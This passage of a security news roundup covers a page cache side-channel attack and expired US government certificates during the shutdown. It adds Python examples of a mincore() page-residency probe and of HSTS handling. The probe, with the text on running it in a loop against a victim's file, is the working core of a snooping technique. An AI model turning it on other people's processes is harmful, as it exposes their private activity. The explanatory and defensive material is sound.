The proper use of cybersecurity would enable detection of misinformation and impede the progress of spreading this kind of propaganda, Innella continued.
“A cyber task force should be formed that combines the awesome power of our intelligence and justice agencies to combat this ever-present danger. A threat to free and honest speech is a threat to our constitutional rights, one which demands an even more powerful response. We absolutely have the people and the technologies to address this growing danger, our government needs to employ it, diligently, and now.”
A research team from Graz University of Technology, Boston University, NetApp, CrowdStrike and Intel has published findings on page cache attacks. Unlike Spectre and Meltdown, this attack is hardware-agnostic: it is a first-of-its-type side channel on the operating system's page cache rather than on the CPU, which the authors say can also be mounted remotely, works against Windows and Linux, and can exfiltrate data while bypassing existing security precautions.
In explaining the attack, authors wrote: “Our side-channel permits unprivileged monitoring of some memory accesses of other processes, with a spatial resolution of 4KB and a temporal resolution of 2 microseconds on Linux (restricted to 6.7 measurements per second) and 466 nanoseconds on Windows (restricted to 223 measurements per second); this is roughly the same order of magnitude as the current state-of-the-art cache attacks.”
After detailing background information on hardware caches, cache attacks, and software caches, the authors provide an attack threat model in which the researchers “assume that attacker and victim have access to the same operating system page cache. On Linux, we also assume that the attacker has read access to the target page, which may be any page of any attacker-accessible file on the system.”
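The 4 KB spatial resolution in the quote above is simply the page size, and the "unprivileged monitoring" is a query of whether a given page of a file is currently cached. On Linux the paper obtains that answer from the mincore() system call, which needs no privileges and no timer. The example below is added here and is not the researchers' code; it wraps that call from Python so the primitive can be seen on a real file. It assumes a Linux host (any POSIX system with mincore() should work), Python 3, and a file the caller may open for writing; the sample file and its contents are constructed in the code. Later Linux kernels, in response to this research, made mincore() report residency only for files the caller could write to, so a probe against a read-only shared library now gets a uniform answer.

```python
import ctypes
import ctypes.util
import mmap
import os
import tempfile

PAGE = mmap.PAGESIZE

# mincore(2): int mincore(void *addr, size_t length, unsigned char *vec)
_libc = ctypes.CDLL(ctypes.util.find_library("c"), use_errno=True)
_libc.mincore.argtypes = [ctypes.c_void_p, ctypes.c_size_t,
                          ctypes.POINTER(ctypes.c_ubyte)]
_libc.mincore.restype = ctypes.c_int


def page_residency(path):
    """One bool per page of the file at `path`: True if that page is currently
    in the page cache. The file is mapped but never read, so the probe itself
    does not fault pages in; this is the timer-free, page-granular query the
    side channel is built on."""
    size = os.path.getsize(path)
    npages = (size + PAGE - 1) // PAGE
    if npages == 0:
        return []
    with open(path, "r+b") as f:
        mm = mmap.mmap(f.fileno(), size, access=mmap.ACCESS_WRITE)
    # Borrow the mapping's address via the buffer protocol (no copy, no read).
    buf = (ctypes.c_char * size).from_buffer(mm)
    try:
        vec = (ctypes.c_ubyte * npages)()
        if _libc.mincore(ctypes.addressof(buf), size, vec) != 0:
            err = ctypes.get_errno()
            raise OSError(err, os.strerror(err))
        return [bool(vec[i] & 1) for i in range(npages)]  # bit 0 = resident
    finally:
        del buf        # drop the exported buffer so the mapping can be closed
        mm.close()


def evict(path):
    """Best-effort eviction (Linux): write back, then advise the kernel to drop
    the file's cached pages. Not guaranteed: a file on tmpfs lives in the page
    cache and stays resident, and pages another process has mapped are kept."""
    fd = os.open(path, os.O_RDWR)
    try:
        os.fsync(fd)
        if hasattr(os, "posix_fadvise"):
            os.posix_fadvise(fd, 0, 0, os.POSIX_FADV_DONTNEED)
    finally:
        os.close(fd)


def touch_page(path, page):
    """The victim side: read one byte from `page`, which loads that page (plus
    whatever readahead adds) into the cache, where the probe can see it."""
    fd = os.open(path, os.O_RDONLY)
    try:
        os.pread(fd, 1, page * PAGE)
    finally:
        os.close(fd)


def make_sample_file(npages=3):
    """Constructed sample: a throwaway file of `npages` pages owned by us."""
    fd, path = tempfile.mkstemp(prefix="pagecache-demo-")
    with os.fdopen(fd, "wb") as f:
        f.write(b"\x41" * PAGE * npages)
    return path


def demo(npages=3):
    """The attacker's view in three snapshots: every page cached right after
    the write, (possibly) dropped after eviction, and page 1 back once a
    'victim' reads it. Returns the three residency vectors."""
    path = make_sample_file(npages)
    try:
        fresh = page_residency(path)
        evict(path)
        after_evict = page_residency(path)
        touch_page(path, 1)
        after_touch = page_residency(path)
        return fresh, after_evict, after_touch
    finally:
        os.remove(path)


if __name__ == "__main__":
    for label, vec in zip(("fresh", "after evict", "after touch"), demo()):
        print(f"{label:12s}", "".join("R" if r else "." for r in vec))
```

The attack in the paper is this probe run in a loop against a file the victim is known to touch (a shared library, a keyboard layout, a document), evicting between samples so that each observed transition from not-resident to resident marks a victim access. The eviction step is the unreliable part on a busy machine, which is where the paper's measurement-rate limits in the quote come from.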
In addition to mitigation strategies, the researchers also stated that they responsibly disclosed the vulnerability to Microsoft, and the company said it will roll out a fix.
"This attack class presents a significantly lower complexity barrier than previous hardware-based, side-channel attacks and can easily be put into practice by threat actors, both nation-state as well as cyber-gangs,” said Mounir Hahad, head of Juniper Threat Labs at Juniper Networks.
“In particular, password recovery via unprivileged applications is a major worry, as it would be available to most unwanted software bundlers and other programs typically thought of as relatively harmless. There is not much that an end user can currently do to protect themselves against this type of attack except to not run any software from a shady source, even if it does not raise any antivirus flag," said Hahad.
The US government shutdown is having a chilling effect on national cybersecurity, with 80 government web certificates having already expired without being renewed and FBI agents issuing a stark warning.
Vendor Netcraft claimed on Thursday that the lapsed certificates include those affecting “sensitive government payment portals and remote access services” at agencies like NASA, as well as the Department of Justice and the Court of Appeals.
The effect of this administrative lapse is that the affected sites are either unreachable or open to interception, depending on how they deploy HTTP Strict Transport Security (HSTS). Where HSTS is properly implemented, modern browsers will refuse outright to connect to a site presenting an expired certificate, said Netcraft.
“However, only a few of the affected .gov sites implement correctly-functioning HSTS policies. Just a handful of the sites appear in the HSTS preload list, and only a small proportion of the rest attempt to set a policy via the Strict-Transport-Security HTTP header — but the latter policies will not be obeyed when they are served alongside an expired certificate, and so will only be effective if the user has already visited the sites before,” it explained.
“Consequently, most of the affected sites will display an interstitial security warning that the user will be able to bypass. This introduces some realistic security concerns, as task-oriented users are more likely to ignore these security warnings, and will therefore render themselves vulnerable to man-in-the-middle attacks.”
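The distinction Netcraft draws above, between a policy the browser already holds (from the preload list or an earlier visit) and one a site tries to set in a Strict-Transport-Security header served alongside an expired certificate, is easy to get wrong when auditing a deployment. The example below is added here and is not Netcraft's or the article's code: it parses the header as RFC 6797 describes and then works through the three visitor cases for a site whose certificate has lapsed. The header values and host scenarios are constructed for illustration.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class HstsPolicy:
    max_age: int                     # seconds the host must be reached over HTTPS
    include_subdomains: bool = False
    preload: bool = False


def parse_hsts(header: str) -> Optional[HstsPolicy]:
    """Parse a Strict-Transport-Security value (RFC 6797 section 6.1).
    Returns None for an invalid header, which a browser ignores entirely."""
    max_age = None
    include_subdomains = preload = False
    seen = set()
    for raw in header.split(";"):
        directive = raw.strip()
        if not directive:
            continue
        name, _, value = directive.partition("=")
        name, value = name.strip().lower(), value.strip().strip('"')
        if name in seen:             # a repeated directive invalidates the header
            return None
        seen.add(name)
        if name == "max-age":
            if not value.isdigit():
                return None
            max_age = int(value)
        elif name == "includesubdomains":
            include_subdomains = True
        elif name == "preload":
            preload = True
        # directives the browser does not recognise are ignored
    if max_age is None:              # max-age is mandatory
        return None
    return HstsPolicy(max_age, include_subdomains, preload)


def visit(cert_valid: bool, header: Optional[str], preloaded: bool = False,
          cached: Optional[HstsPolicy] = None):
    """Model one HTTPS visit. Returns (outcome, policy the browser holds after).

    outcome is "ok", "hard-fail" (error page with no bypass) or
    "bypassable-warning" (an interstitial the user can click through).
    Follows RFC 6797 sections 8.1 and 12.1: a host is a 'known HSTS host' if
    it is preloaded or has a cached policy, and an STS header received over a
    connection with certificate errors is discarded."""
    if cert_valid:
        policy = parse_hsts(header) if header else None
        if policy is not None:
            cached = None if policy.max_age == 0 else policy   # max-age=0 clears
        return "ok", cached
    # certificate error: any header on this response is ignored, so only
    # what the browser knew beforehand decides the outcome
    known = preloaded or cached is not None
    return ("hard-fail" if known else "bypassable-warning"), cached


def shutdown_scenarios():
    """The three cases for an expired certificate on a site that sets the
    header but is not on the preload list (constructed scenario)."""
    header = "max-age=31536000; includeSubDomains"
    first_time = visit(False, header)[0]
    returning = visit(False, header, cached=parse_hsts(header))[0]
    preloaded_host = visit(False, header, preloaded=True)[0]
    return {"first-time visitor": first_time,
            "returning visitor": returning,
            "preloaded host": preloaded_host}


if __name__ == "__main__":
    for who, outcome in shutdown_scenarios().items():
        print(f"{who:20s} -> {outcome}")
```

The practical reading for an operator: a site gets the hard failure, the one users cannot click through, only if it is on the preload list or served a valid max-age before its certificate lapsed. Adding the header after the lapse protects nobody, and a user who has never visited the site sees a warning an attacker can count on them bypassing.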
The concern is that as the shutdown continues, growing numbers of certificates will expire without being renewed, increasing the security risk.
The National Institute of Standards and Technology (NIST) is particularly badly affected by the shutdown, with an estimated 85% of personnel furloughed and its website shut.
That’s bad news for the information security community as NIST guidance documents and frameworks are widely consulted to improve baseline security practices around the world.
As if that weren't enough, FBI special agents have signed an open letter warning that the shutdown could hurt operations and even force agents to consider roles elsewhere.
"As those on the frontlines in the fight against criminals and terrorists, we urge expediency before financial insecurity compromises national security," they said.
Suzanne Spaulding, a former Department of Homeland Security (DHS) under-secretary and Nozomi Networks advisor, warned that the loss of so many government employees means the US is “losing ground against our adversaries.”
“And the timing couldn’t be worse, with Congress just having established the new Cybersecurity and Infrastructure Security Agency (CISA) at the DHS,” she added.
“Getting this agency fully operational requires a lot of work and it’s like repairing an airplane while you’re flying it. You try to avoid disrupting the critical operational activity even while you make changes to improve the organization. This shutdown is a disruption CISA can ill afford.”
House Democrats have accused Trump of holding the country hostage over an exaggerated threat, as he demands over $5bn to fund a wall on the southern border with Mexico that he originally promised would be paid for by the Latin American nation.
The current shutdown is the longest since 1995, with an estimated 800,000 federal employees expecting not to be paid this week. Most Americans blame the president for the impasse, according to a new poll.